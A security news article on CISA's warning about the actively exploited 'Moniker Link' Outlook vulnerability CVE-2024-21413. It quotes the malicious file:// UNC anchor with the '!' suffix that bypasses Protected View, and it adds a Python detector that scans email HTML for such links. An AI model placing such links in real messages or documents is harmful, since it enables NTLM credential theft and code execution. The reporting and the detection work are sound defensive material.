Critical RCE bug in Microsoft Outlook now exploited in attacks

CISA Urges U.S. Federal Agencies to Secure Systems Against Critical Microsoft Outlook Vulnerability

The Cybersecurity and Infrastructure Security Agency (CISA) issued a warning to U.S. federal agencies, urging them to secure their systems against ongoing attacks exploiting a critical remote code execution (RCE) vulnerability in Microsoft Outlook.

This vulnerability, identified by Check Point researcher Haifei Li and tracked as CVE-2024-21413, arises from improper input validation when opening emails containing malicious links in affected Outlook versions. Exploiting this flaw allows attackers to bypass Protected View—a security feature designed to block harmful content by opening files in read-only mode—and execute malicious Office files in editing mode.

Microsoft initially patched CVE-2024-21413 one year ago, highlighting that the Preview Pane also serves as an attack vector, enabling exploitation even when merely previewing maliciously crafted Office documents.

According to Check Point, this vulnerability—referred to as “Moniker Link”—allows threat actors to circumvent built-in Outlook protections by embedding malicious links using the file:// protocol and appending an exclamation mark followed by random text to URLs pointing to attacker-controlled servers. For example:

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
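The link shape above is something mail gateways and SOC tooling can look for directly. The following detector is an added example written for this page, not code from the article, Check Point or Microsoft: it pulls every anchor href out of an email's HTML body, keeps only file:// links that point at a UNC share, and separates the "!<text>" suffix form the article describes from a plain remote file link (the latter is still worth review because of the NTLM credential-leak risk the article mentions). Hostnames, sample bodies and function names are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Added example, not code from the article or from Check Point/Microsoft.
# It flags anchor hrefs in an email's HTML body that use the file:// scheme
# to reach a UNC share, and distinguishes the "!<text>" suffix shape the
# article describes ("Moniker Link") from a plain UNC file link.


class _HrefCollector(HTMLParser):
    """Collect href values from <a> tags (attribute entities are decoded by HTMLParser)."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "a":
            return
        for name, value in attrs:
            if name.lower() == "href" and value:
                self.hrefs.append(value)


def analyze_href(href):
    """Classify one href. Returns a finding dict, or None if it is not a file:// link of interest."""
    decoded = unquote(href.strip())
    if not decoded.lower().startswith("file:"):
        return None
    # Drop the scheme and any mix of leading slashes/backslashes
    # (file:///\\host, file://host, file:////host all normalise to "host\...").
    rest = decoded[len("file:"):].lstrip("/\\").replace("/", "\\")
    host, sep, path = rest.partition("\\")
    if not sep or not host:
        return None
    is_local_drive = re.fullmatch(r"[A-Za-z]:", host) is not None
    bang = path.find("!")
    if bang >= 0:
        # "!<text>" after the resource is the bypass shape quoted in the article.
        kind, resource, suffix = "moniker_link", path[:bang], path[bang + 1:]
    elif is_local_drive:
        return None  # ordinary local file link without the suffix: not interesting here
    else:
        kind, resource, suffix = "unc_file_link", path, ""
    return {"kind": kind, "host": host, "resource": resource, "suffix": suffix, "href": href}


def scan_email_html(html):
    """Return a finding for every suspicious file:// anchor in an HTML email body."""
    collector = _HrefCollector()
    collector.feed(html)
    return [f for f in (analyze_href(h) for h in collector.hrefs) if f]


# Constructed sample bodies; the first reuses the link shape quoted in the article.
SAMPLE_SUSPICIOUS = r'<p>Invoice attached.</p><a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>'
SAMPLE_BENIGN = '<a href="https://example.com/report!2025">Report</a><a href="mailto:it@example.com">IT</a>'

if __name__ == "__main__":
    for body in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        for finding in scan_email_html(body):
            print(f"{finding['kind']}: host={finding['host']} "
                  f"resource={finding['resource']} suffix={finding['suffix']!r}")
```

The classifier normalises slashes and percent-encoding before matching, so `file:////host/share/x.rtf!a` and `file:///%5C%5Chost%5Cshare%5Cx.rtf!a` land in the same bucket as the article's form; an `https://` URL containing `!` is deliberately ignored because the bypass depends on the file scheme. A "moniker_link" hit is a strong signal on its own; a "unc_file_link" hit pointing at a host outside the organisation is a candidate for the credential-theft angle and deserves a look even without the suffix.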

CVE-2024-21413 affects multiple Microsoft Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019. Successful exploitation can lead to NTLM credential theft and arbitrary code execution via specially crafted Office documents.

CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, marking it as actively exploited. Under Binding Operational Directive (BOD) 22-01, federal agencies are required to secure their systems within three weeks, by February 27, 2025.

“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” CISA warned.

While CISA primarily alerts federal agencies to vulnerabilities requiring urgent mitigation, private organizations are also strongly advised to prioritize patching to prevent potential attacks.

Reference:
Critical RCE bug in Microsoft Outlook now exploited in attacks – BleepingComputer
